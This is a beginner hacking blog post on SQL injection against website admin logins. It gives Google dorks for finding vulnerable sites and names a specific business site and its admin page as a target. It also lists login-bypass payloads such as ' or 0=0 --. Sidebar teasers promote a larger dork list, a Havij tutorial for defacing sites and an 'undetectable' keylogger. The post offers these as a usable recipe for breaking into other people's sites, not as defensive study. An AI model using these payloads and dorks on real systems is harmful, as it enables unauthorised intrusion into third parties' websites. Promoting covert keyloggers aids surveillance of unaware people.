Skip to main content

Simple Sql Injection Tutorial How To Hack Web Site with Sql Strings/Sql Injection [very easy]

Image
By

                           What Is Sql Injection?



SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters from user, and make SQL query to the database, are targeted. For Example, A web page with username and password, fires SQL query on the database to check whether a user has entered valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.


Requirements :

  • First we need to find Sites for Hacking if we have to hack sites we must need to know how to find sites

Basically we use Dorks for Find Sites

some google dorks:
  1. "inurl:admin.asp"
  2. inurl:adminlogin.asp
  3. inurl:login/admin.asp

  4. inurl:read.php?=

  5. inurl:”ViewerFrame?Mode=”

  6. inurl:index.php?id=

  7. inurl:trainers.php?id=

  8. inurl:buy.php?category=
  9. inurl:article.php?ID=

now open google.com and copy any one dork form here and paste that on google and click search, you will get many SQL vunerablee sites

so we Found Sites Now we need to Find Admin Login Page of a Site.

now open sites one by one. and you will got admin login page.

Now we have done 2 step 1 is find vuln sites and 2nd is Find Admin login

Now Come to Main tutorial about Sql strings/injection

what is sql strings?

when we put sql string in admin login then login penal cant handle the queries and redrict you into admin area.

For Example i found a Site: http://www.roseandcrownrangeworthy.co.uk

and i found admin login panel: http://www.roseandcrownrangeworthy.co.uk/admin-home.asp

1st i tried username :admin and password: admin but i did not enter

but after i enter username: admin and password :   ′or’1′=’1
if the password not works try others passwords:

  • 'or'x'='x
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #


Thats it Guys if you getting Problem plz Comment or contact with me
Labels:

Comments

Post a Comment

Popular posts from this blog

World Largest SQL Google Dork Colection

By
 inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num=
Post a Comment
Read more

Hack WebSite’s Admin login Using Havij Sql Injection Tool Full Detailed with Example Sites and ScreenShots

By
Hi Friends in this Tutorial i will Tell you How to Hack Web Sites With  Sql Injection  tool, there are hug of sql vulnerable sites available for deface.. You Can Learn Step by Step this Tutorials. I made this Tutorial with alot of details and examples.
13 comments
Read more

Best Keylogger Software:Max Keylogger

By
There are a lot of keyloggers available on internet and selecting a best is indeed a difficult task.If you are also looking for a keylogger that tracks each   key stroke , send reports to emails , take screenshots   , Is Undectable   and   Copy text from Clipboard   then   Max Keylogger   is best for you. Are Keyloggers Legal To Use? Keyloggers are usually associated with hacking but this is not the case.It is completely legal to use keyloggers to monitor activity of employees,Children and other people using your computers. Different People can have Different Purposes For using a Keylogger To System administrators : Keylogger could help you clearly know about what have been displayed in the system. protect yourself know everything they do on your computer. To CEOs : The computers in your company are under your full control with   Max Keylogger . You will be clear about all your employees’ performances or actions anyone using your official compu...
3 comments
Read more